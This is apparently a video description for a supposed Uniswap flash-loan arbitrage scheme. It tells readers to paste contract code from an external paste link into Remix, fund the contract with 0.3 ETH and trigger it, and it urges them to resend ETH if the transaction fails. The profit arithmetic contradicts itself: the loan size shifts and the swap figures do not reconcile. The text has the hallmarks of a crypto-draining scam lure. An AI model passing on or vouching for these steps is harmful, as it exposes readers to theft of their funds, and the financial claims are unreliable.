In this video, you can see how I used Flashloans to Arbitrage in Uniswap. We deploy our own contract on ETH Network to create a new token and 2 liquidity pools to swap between DAI and ETH. We keep profits in ETH and this can be repeated at times. Higher the volatility, higher profit due to price change. Please note that the profit might differ each time depending on the price of ETH. Please follow the instructions in the video.

STEPS:

Before starting, install and setup MetaMask in Chrome Browser.

1. Open and setup Remix in browser (https://remix.ethereum.org)

2. Copy the Contract code (https://ghostbin.com/paste/Yyd1A)

3. Create new file in Remix and paste Contract code and wait for everything to load

4. Enter your token details and deploy the contract

5. Get the Contract address from Remix

6. Send 0.3 ETH to the contract for gas fee for all swaps (There are going to be many swaps to use all funds from out liquidity pools. So, its going to take around 0.3-0.35 ETH fees)

7. Call ‘flashloan’ function in Remix.

How the smart contract works:
1. We will borrow a flash loan of around 1,000 ETH from Uniswap to make an arbitrage trade on Uniswap itself.

2. To prepare the arbitrage, ETH is swaped into USDT using PancakeSwap swap contract code. (50% ETH swapped into 50% USDT) (At the time of this video, 1 ETH = 2500 USDT); So we will have about 500 ETH and 1.25M USDT.

3. The code will let you deploy your own token on Uniswap.

4. Provide liquidity in the 2 pools in such ratio (it is our own token and liquidity pool, so we have the power to set the initial price of the token):

Your Token (TOK) : ETH has 1:1 ratio (TOK 1 = 1 ETH)

Your Token (TOK) : USDT has 1000: 1 ratio ( TOK 1 = 1000 USDT)

5. The code perform the following swaps in a loop until all the initial flash loaned amount is in our liquidity pools:

Swap ETH (500) into TOK (500)

Swap TOK (500) into USDT (500,000)

Swap USDT (1,750,000) into ETH (700)

6. You will now have 700 ETH. You can repay the 500 ETH loan + any gas fees + Slippages and keep the remaining as profits, all within the same smart contract.

**********************************************ATTENTION********************************************
*IF YOU DONT PUT THE ENOUGH ETH THE BORROW AND THE FLASHLOAN MIGHT FAIL due to the interest to be paid at the end of the flash loans or transaction gas cost. Add at least 0.3 ETH in each transaction.
*If it still fails, please repeat the TX again WITH 31560 GAS LIMIT AS SEEN IN THE VIDEO.
